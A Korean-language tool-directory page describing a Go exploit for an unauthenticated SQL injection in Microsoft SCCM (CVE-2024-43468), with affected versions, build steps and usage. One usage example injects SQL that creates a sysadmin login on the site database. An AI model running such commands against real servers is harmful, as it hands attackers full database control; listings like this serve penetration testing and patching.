Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
도구/GitHubGitHub/nikallass/cve-2024-43468_mtls_go
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationRed Teaming
GitHubnikallass/cve-2024-43468_mtls_go

CVE-2024-43468_mTLS_go

CVE-2024-43468 SCCM SQL 인젝션 익스플로잇 (MacOS 키체인 버전의 추출 불가능한 mTLS 클라이언트 인증서)

저장소 보기
3221년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-43468 SCCM SQL 인젝션 익스플로잇 (macOS 키체인의 mTLS 클라이언트 인증서 버전)

macOS 키체인을 사용하여 mTLS 인증을 수행하는 (키체인에서 키를 내보낼 필요 없이) CVE-2024-43468 익스플로잇의 Go 구현입니다.

추가로:

  • 문제가 있는 proxychains를 사용하지 않도록 프록시 지원을 추가했습니다.
  • 인증서 Common Name을 가져오는 get_cert_name.py를 추가했습니다 (네, Keychain Access GUI에서 수동으로 할 수도 있습니다).
  • 어떤 일이 일어나고 있는지 확인할 수 있도록 디버깅 로그를 많이 추가했습니다.

기반:

  • 원본 Python 익스플로잇
  • mTLS Go Client 예제

설명

Microsoft Configuration Manager(ConfigMgr / SCCM)의 인증되지 않은 SQL 인젝션을 악용하여 네트워크에서 Management Point에 접근할 수 있는 공격자가 사이트 데이터베이스에 임의의 SQL 쿼리를 실행할 수 있게 합니다.

취약한 버전:

  • < 2403 (5.00.9128.1024)
  • < 2309 (5.00.9122.1033)
  • < 2303 (5.00.9106.1037)
  • <= 2211

설치

root@kitploit:~
# Clone repository
git clone https://github.com/nikallass/CVE-2024-43468_mTLS_go
cd CVE-2024-43468_mTLS_go

# Install dependencies
go get github.com/google/uuid
go get golang.org/x/net/proxy

# Build
go build -o sccm

사용법

root@kitploit:~
# Show help
./sccm -h

# Basic usage (creating new admin)
./sccm -t https://sccm-mp.local \
       -sql "create login user123 with password = 'Password123'; exec master.dbo.sp_addsrvrolemember 'user123', 'sysadmin'" \
       -cn "CertificateCommonName"

# With custom proxy (check with sleep 5)
./sccm -t https://sccm-mp.local \
       -sql "WAITFOR DELAY '0:0:5'" \
       -cn "CertificateCommonName" \
       -proxy "127.0.0.1:9050"

매개변수

  • -t : 대상 URL (필수)
  • -sql : 실행할 SQL 쿼리 (필수)
  • -cn : macOS 키체인의 인증서 Common Name (필수)
  • -proxy : SOCKS5 프록시 주소 (기본값: 비어 있음)

요구 사항

  • macOS (키체인 통합용)
  • Go 1.16+
  • macOS 키체인의 클라이언트 인증서
  • 선택 사항: SOCKS5 프록시

참고 자료

  • Microsoft Advisory
  • Synacktiv Advisory
  • mTLS Go Client example
도구 다운로드